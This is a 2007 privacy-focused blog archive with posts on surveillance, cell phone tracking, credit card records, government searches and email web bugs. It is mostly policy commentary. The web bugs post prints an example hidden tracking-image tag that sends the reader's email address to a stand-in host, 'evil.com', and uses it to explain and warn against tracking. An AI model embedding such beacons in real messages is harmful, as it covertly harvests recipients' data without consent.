Sunday, October 14, 2007

Security or Transparency; different views of privacy

When it comes to dealing with private information, there tends to be two paradigms that I hear espoused most frequently; secrecy and transparency. Those who favor the secrecy paradigm believe that information needs to remain hidden from others. People who subscribe to this paradigm tend to be those who we might have usually considered privacy advocates. From this point of view comes most of the writings that you find on the topic of privacy. Implicit in most discussions of the secrecy view of privacy is that information needs to be kept secret from all other parties.

It is easy to see how to support this view; people point to the tracking information used by government databases, marketing lists and nosey neighbors as evidence of need for privacy. Stories such as how the Nazi’s used public records to track Jews are often used to show the dangers in government consolidation of private information. What is less clear is how the transparency paradigm works.

On the other side of this discussion is the idea that transparency may be the best way to deal security. This is an interesting model since it relies on two things, acquiescence to power and belief in benevolent (or controllable) leadership. In this case the idea is that certain pieces of data need to be inspected as part of contractual obligations, legal mandates or national interests. In such situations, it isn’t that the information needs to be protected from all viewers, but that the dissemination, or use of that data beyond defined limits should be banned or protected though civil litigation.

Some examples of these two views in action are Amazon.com and British Petroleum. Amazon.com has a large set of (sometimes onerous) remote access and data protection measures that are intended to protect the integrity of Amazon.com’s intellectual property. Like may high tech companies, Amazon is concerned that anyone might access it’s data inappropriately and thus has erected major hurdles to accessing this information (Hurdles that exist for those that legitimately want to access it as well).

On the other side of this discussion is British Petroleum. BP has decided to take some of its critical system (like email) and have them hosted by third parties (making them far easier to access from a governmental and legal discovery aspect). BP makes a compelling argument that any of these resources could be “discovered” though governmental powers or legal subpoenas so spending money and resources to “hide” these assets is not very valuable. In their mind, the money it would cost to implement such functions is not worth the cost.

Clearly other organizations take a different view. What is interesting is that this view is a bit like other models we see. From CEO of Sun Microsystems saying “Privacy is dead, get over it” to the explosion of social networking sites like MySpace, Orkut, Friendster and Facebook; it does appear that people do feel ok giving more of their personal information that would have been discoverable though general detective work online.

When might this matter? This week it was discovered that the NSA sought to setup warrantless wiretapping of Americans. This isn’t much of a revelation since the White House stated that this was done in a response to the 9/11 attacks. For better or worse, most Americans accepted this as a trade off of liberty for temporary security, but it now appears that this program was started before 9/11. This is a big shift from what we’ve heard before. Under the secrecy paradigm, this would be quite concerning. Effort would be spend investigating and trying to change laws to roll back this system. On the other hand, if the transparence (or disclosure) paradigm were the idea from the start, there would be no issue, worry or cost to such an action.

Some people might point out that the “transparency” view is really just a pretty package around the loss of privacy. I would point out that there are important distinctions that are part of this view though. All information is not public, it is simply managed differently. Liability would apply to its abuse while the efficient transfer of this information could facilitate the efficient adjudication of issues and protection of citizens. At the root of this view is the belief in differentiating what you want to hide and the benevolence in those that hold this information. Ultimately it’s a matter of trust and accountability. Secrecy has always been about trust, the transparency paradigm shifts the thinking around trust from a “me against the world” to an “us against the others”. Different organizations (and people) are choosing to act on each of these philosophies. Time will tell us, which works best for society.

Sunday, October 7, 2007

Third parties are like third wheels; rarely wanted.

Much of our communications these days is sent though third parties. Indeed, it’s pretty hard to think of anything besides face to face communications (or passing notes in gym class) that doesn’t go though a third party. I’d love to use the passing notes example as one that is analogous, but the fact is that it’s only half the story. Most communications (like phone calls, wireless phones, and cell phones) pass though third parties. Those parties can monitor those communications (with varying levels of required legal permission). This isn’t anything surprising since most people know about things like wiretaps. What may be surprising is that in the cases of electronic communications; not only can your communications be intercepted; they are (in many cases) recorded and archived.

This came to many people’s attention during the Koby Bryant case. To give a quick refresher; they were combing though the alleged victim’s text messages to see what she was saying to other people after the alleged incident. The same thing happens with emails.

At issue in each of these cases is the fact that communications are stored on a third party server. That server then monitors, archives or both those communications. This means that those communications are legally discoverable and have a lower level of legal protection than other communications you may have. For example, speaking to someone, is protected since you can’t be forced to incriminate yourself (5th amendment). Recording a conversations between two parties requires both consent in many states. On top of these, parties involved in such conversations, might fight the discovery of such pieces of evidence, should they exist. On the other hand, third parties have less of an incentive to protect this information. In some cases they actually have reason not to protect it. These reasons can be anything from wanting to maintain good relations with the government (who regulates their communications though licensing), or not wanting to endure the legal costs of protecting someone else’s information.

In each of the presented cases, the take-away is that information that transfers though third parties is out of your control. Just like property (which is the paradigm that the law uses for most personal information) once you give it to someone else (like a phone company or an email service) they have a different (lower) set of incentives to keep that information safe. You should always be aware that when you pass information though others, there is the change that they may read, archive, or even change that information.

Monday, October 1, 2007

Cell Phones – Is that a locator in your pocket or are you just happy to see me?

Cell phones are a nearly ubiquitous these days. Many of us care them with us at all times and give little thought to how the technology works. I won’t go into the legal differences for cell phones vs. land lines (there are drastically different legal treatments of the two technologies when it comes to tapping the “line”) but I do want to talk a little about cell phones as tracking devices.

You’re probably used to your phone working wherever you go and you have probably never given a lot of though to the question of “how does the phone company know to make my phone ring no matter where I am?” Do they send that same ring out to every tower in all the cell networks in the world simultaneously? Of course not. So how does it know to connect your call to you, where you’re at? The answer is that your phone does a “ping” ever once in a while. This ping (much like the computer networking term and the naval term it derived from) is sent from your phone to the closest cell tower to let it know that you’re there. This way the phone company knows where to send your calls when they come in. What you may not know is that the phone companies keep these records. In effect they have a log of where you are, and have been, for years. In Ireland this has sparked a legal battle, though nothing of the sort has erupted here in the US.

Of course this information isn’t all nefarious; but it is necessary for the network, and is now required by the US govt. Thanks to E911 legislation; cell carriers are now required to be able to get coordinates of a cell phone user who calls 911. Of course this technology is equally useful for locating users for other reasons. It hasn’t taken marketers long to see the benefits of this. McDonalds knows that no matter how much it spends on advertising, most of its sales come from people who see a restaurant and drive in (or thru). This is partially why you see fast food restaurants everywhere and why you see competing restaurants near each other. Now think if you could contact those people and send them a message, “stop in the Burger King ahead and get a $0.99 Whopper”.

Consumers are also being sold this technology. In some cases, it’s a mapping service; while in others, it’s a set of personal tracking services. Many of these are sold to parents as a way to keep track of their children. In other cases people are using the technology so they can keep in touch with their friends (Mologogo, MSSLAM).

The take away is that, whether you know it or not, your cell phone is always tracking where you are at. This data is stored for an undisclosed period of time. You are also not able to have this data deleted or keep it from being collected (unless you turn your phone off). Since this data is sent at all times your phone is on, this data provides a very descriptive set of information about where you are, and have been. I’ve known more than a few privacy advocates that use pay as you go cell phones and get new phones every month in order to diminish their traceability. This seems a bit extreme to me though each of us will decide what level of privacy we want. Remember that since this is not considered your data (legally speaking) you should be comfortable with this data being collected, and potentially sold. Some countries (like Germany) have enacted privacy legislation to allow users to request that their data be completely removed from a system (current case deals with computer IP information). Of course this is in response to the European Commissions’ Data Retention Requirements.

Sunday, September 23, 2007

Privacy and Privileges: The back door to compelling information disclosure

The 4th, and 14th, amendments ensure that the federal and state governments cannot search though our person affects without our permission. Additionally the 1st amendment protects our freedom of speech as well as our freedom of association (considered part of protected speech). Now there are exceptions to this. The most obvious one is the USA PATRIOT Act that I’ve written about before. This act gives the government the ability to do “sneak and peek” searches of your computer and home without your consent or a warrant. That act aside, in general we either need to consent to a search, or the government needs enough information to issue a warrant to allow a search.

The reason all this matters is that most people rely on the government at some point in their lives (many of us on a daily basis). If you don’t think you do, think about a couple examples: first, the case where the government gives you financial assistance. From tax breaks for children, to student loans, Pell grants, to the Montgomery G.I. Bill funds, from welfare to Medicare or social security, it is highly likely that you have, are or will receive some help from the government. In such cases, the government has used this “non-required” assistance to justify searches that would be unconstitutional in any other aspect. The contemporary example is the legal fight going on right now in San Diego over those who receive public assistance. Part of this legislation gives agents of the state the ability to search people homes to ensure that they are complying. Perhaps you feel that this is a fair trade-off to ensure public aid isn’t abused and that it provides an incentive for people to do what they can to get off of public assistance.

The people who make this argument tend to be those who have done well in life and are not subject to such searches (it’s always easier to legislate what someone else should do). Fear not though, this is where the “privileges” part of this comes in. Though legislation like the REAL ID act (currently being fought in a number of states) data is being aggregated and centralized. So if you drive a car, then that information is collected (and if all states comply, then that will be national, this is why many states are fighting the act and why most private investigators use Drivers Licenses as their preferred way to track people). Even if you forgo the car, but you travel by air, then you are still under surveillance (and remember this is surveillance without any reasonable cause to survey you). As has come out recently, airport screeners were cataloging the information of travelers heading overseas. Information like who they were seeing/staying with, what was in their luggage and even what books they were reading was cataloged and stored. The government is “loosely” kept from sharing this information by the Privacy Act of 1974.
Unfortunately, the Supreme Court ruled in Doe v. Chao that the act mandated damages of at least $1000 is only due if the injured party (the one who had their private information given out by the government) can show actual damages from the leak (of course, finding out that someone shared info that got you on a no fly list, blocked from getting a govt. grant or surveyed by the FBI to your economic determent might be pretty tough).

What is clear in these cases is that our view of individual rights is not evolving with our society. We are continuing to interpret our rights in the same manner that was done tens, if not hundreds of years ago. In a world where “privileges” (like driving, flying and receiving assistance) are an integral part of almost every US citizen (and business’) life, we may want to start thinking about the ways we feel privileges are separated from rights. We all appreciate the freedoms we have here in the US. Many of us believe that our privileges are really just extensions of our right, but at present this is not the case at all. Since many of these “privileges are requirements for us in modern life, what we may be looking at is a loophole that’s being actively exploited to circumvent the 4th, and 14th, amendments.

Is this the right balance to strike? That is a decision for the American people, but I don’t think it bodes well when such actions are taken outside of the public light (the traveler information only came to light as part of a Freedom Of Information (FOIA) suit. I think changing circumstances require US citizens to consider the tradeoffs they make, but when these are forced though programs that are voluntary in name only, or are done out of the public sight, the specter of a meddling government, instead of one, by, of and for the people starts to show up.

Sunday, September 16, 2007

Credit Cards: The Pocket Snitch

I once heard that in France they have a saying that if you want to find the scandal with a politician, you should, “Follow the women” , in the States we’d more likely say, “Follow the money”. Setting aside the indications about what is important to each culture’s men, this creates a telling situation about how people go about investigating each other.

When I was younger I took quite readily to credit cards. I enjoyed the ability to spend when I wanted to (a habit it appears our culture has embraced somewhat zealously) while being free from the potential of a lost wallet (to forgetfulness or robbery). What I never considered was what I was giving up for this convenience. For me, my fiscal responsibility kept the dangers of credit card debt from ever becoming the problem it is for most folks in the United States today, but the tracking capabilities are quite real.

For the moment I’m going to set aside the financial implications of someone adding a 2-5% fee on every transaction and how that can raise prices for consumers; I’m going to focus mostly on the privacy implications. Just think about your credit card bill; every month you get a nice list of where you were with locations, dates times and even how much you spent. Looking at these records over time and you get a view of what a person’s life is like. Indeed, advice given to those concerned about stalking advises them not to use credit cards because of their traceability. In many cases, most of us aren’t being stalked by anyone more sinister than marketers and some might reasonably ask, “I’m not worried about staking, why should I care?” The answer is that this valuable form of data aggregation is not only used by marketers and stalkers, but also by law enforcement and governments to spy on their populations. Section 215 of the USA PATRIOT Act, give the US government the ability to look at 3rd party holders of a person’s information (like an email provider or a financial institution). Of course the US government has been monitoring financial transactions of a certain size ($10,000 or greater) for a while though FinCEN. What the USA PATRIOT Act did was increase the ability for the government to get access to these records (and without your knowledge).

From a privacy perspective, it is the potential of abuse of this data that is most concerning. Where you eat and shop, what organizations you donate to and you personal habits are all contained in the records created by these little cards. Cash, on the other hand, “tells no tales and leave no trails”; or so you might think. At least here in the states this is true, though other parts of the world are experimenting with traceable money under the auspices of currency protection.

The bottom line is that money the base unit of transactions in our world. Because of this, the ability to see how a person spends their money tells you a lot about who they are, we need to be careful about who we give this information to. Some people, like Jerry Springer, find out the hard way that financial records can tell tales they would rather not have told (Jerry was caught using a personal check at a house of ill repute while he was a Cincinnati city council member). Both the appearance of data, and it’s absence are things some might be concerned about (if you eat lunch every Saturday at the local pizzeria and one Saturday you don’t eat there, someone might wonder what caused the change in circumstances (especially if an investigations is ongoing about an occurrence on that date)). So the next time you reach for the plastic, just remember that you’re checking your privacy at the counter.

Sunday, September 9, 2007

Web Bugs: Is your email infested?

In as earlier post I mentioned Web Bugs. Web Bugs are a piece of code that is virtually invisible to users of the web, but they allow the users of them to track you. How this works is they add an image to an email (most of us are using HTML email these days) and they add this image in a way that you don’t see it. How do they do that? By making it a 1 pixel (the smallest dot on your computer screen) and then making that pixel transparent (so even if you knew which pixel you couldn’t see it). The trick is that the image isn’t an image at all, but a special webpage that is designed to return a clear 1 pixel image while recording and interpreting the query string data in the request. So a regular image might look like this in your web coded email <img height="110" src="http://www.images.com/puppies.jpg" width="120" />; but the web bugged one might look like this: <img src="http://www.evil.com/tracker.cgi?email=you@email.com" width="1" /> The part where it has your email address (you@email.com in this case) is passed to evil.com’s server where they can record your computers address (IP address) the time you accessed the email and then record every time you open that mail. If they wanted to, they could even put a cookie on your machine to track you if you went to another site where evil.com had code running (or images showing like an ad server).

Why do spammers, snoops and stalkers use this kind of tool? Because it works and because they can be sure you got the message. In newer versions on email programs (like Outlook, Eudora, Thunderbird, etc.) users can set up their mail so that images do not show automatically. You may have already seen a page that looks like this:

The reason you have to click on a link to show the images is that it gives you a chance to see if this email is one you want to view before letting a potential spammer know that they now have your email address. Since many web Mail companies (gmail, live, yahoo, etc.) automatically show you HTML emails, the Web Bugs work by default on those sites (which are used by a majority of web users).

Before, I mentioned stalkers. That was not an idle statement. Several web companies now sell you the ability to attach web bugs so that you can tell if someone has received your email. Since the technology is pretty simple, most companies that do email marketing on the web, have built their own Web Bug engines to help them track users. In many cases web filters and anti-spam filters block the sites the bugs attach to but this is only effective as a reactive means of protection. If you are truly concerned about Web Bugs tracking you online, switching your email client to “text only” from HTML email” will ensure that these Web Bugs can’t track you.

Sunday, September 2, 2007

The Naked Truth: Are Strip Searches An Invasion Of Privacy?

When I read that in 1978 Chicago was strip searching everywoman who came into their women’s jail I was surprised (to put it mildly). I though, “Are you serious?” This became all the more shocking when it became clear that the woman was at the jail because of unpaid parking tickets. I though that our society was far past the point where that would be considered reasonable. Alas, sometimes we are too hasty with our desire for what we consider “obvious” changes. What made it all the more shocking was when I learned that Washington State, just last year, had its appeals court strike down blanket strip searches. Perhaps this seems obvious to most folks that unless you pose a serious risk or they police have a warrant, they shouldn’t be able to make you go though such an obviously invasive search. This is important not only because of its obvious implications on everyday citizens, but also because this is the core of a privacy discussion (being secure in your “persons, houses papers and effects”). If such things as strip searches are “up for debate” then we can’t possibly have a serious debate about electronic observation and privacy invasion.

It might be valuable to hypothesize about how we got to such a point. As a matter of efficiency, and perhaps as a matter of avoiding bias, the Chicago PD had a policy of strips searching any female prisoner who came into the facility (they had one for all of Chicago at the time). Is it possible that there was so much contraband that everyone was suspect? Was it possible that to search only certain individuals would open the Chicago police up to claims of bias? On the first there is little evidence to support this; on the second (given the Chicago PDs history) it is entirely possible.

So it would seem that the obvious answer to our question as to strip searches being a violation of privacy is self-evident. What is more shocking is how distant what we might think as an average citizen is different from what may be the reality (depending on the jurisdiction you are in). In all, it really comes down to one of those fundamental questions we will ask ourselves (as a society), “How much liberty are we willing to give up pursuit of security?” I won’t make the claim, as Benjamin Franklin did, that “Those who would give up essential liberty to purchase a little temporary safety, deserve neither liberty nor safety.” But I will note that the solution to our criminal problems is probably not in strip searching parking ticket violators. That, I would hope, would be clear to anyone.